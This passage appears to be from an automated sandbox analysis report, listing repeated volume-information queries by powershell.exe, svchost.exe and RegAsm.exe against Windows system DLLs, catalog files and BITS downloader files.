Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
